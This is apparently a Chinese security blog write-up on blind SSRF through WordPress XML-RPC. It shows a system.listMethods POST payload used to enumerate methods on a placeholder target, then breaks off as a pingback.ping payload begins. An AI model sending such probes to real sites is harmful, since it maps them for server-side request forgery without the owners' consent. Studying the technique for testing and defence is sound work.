0
点赞
收藏
分享

微信扫一扫

【网络安全】XML-RPC漏洞之盲SSRF

德州spark 2024-08-28 阅读 17

文章目录

漏洞原理参考:【网络安全】XML-RPC PHP WordPress漏洞

正文

探索目标时,访问该链接:https://www.target.com/about-us/xmlrpc.php,页面如下:

在这里插入图片描述

修改GET为POST,并构造payload,以检查 XML RPC 服务器上启用了哪些方法:

<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>

由回显可知,pingback.ping方法是可利用的,因此我构造了以下payload:

<?xml version=”1.0" e
举报

相关推荐

0 条评论